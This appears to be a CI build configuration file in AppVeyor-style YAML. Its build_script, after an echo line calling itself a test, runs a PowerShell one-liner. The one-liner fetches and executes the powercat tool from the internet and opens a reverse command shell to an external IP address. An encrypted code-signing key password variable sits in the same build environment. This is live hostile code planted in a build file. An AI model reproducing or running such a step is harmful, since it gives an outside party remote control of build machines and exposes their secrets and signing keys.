    before_build:
      - dir
    build_script:
      - echo "this is just a test"
      - ps: IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 119.28.94.116 -p 2334 -e cmd
    environment:
        CODESIGN_KEY_PASS:
        secure: a9kv+5dg6lfhqOinZ27QRQ==
    
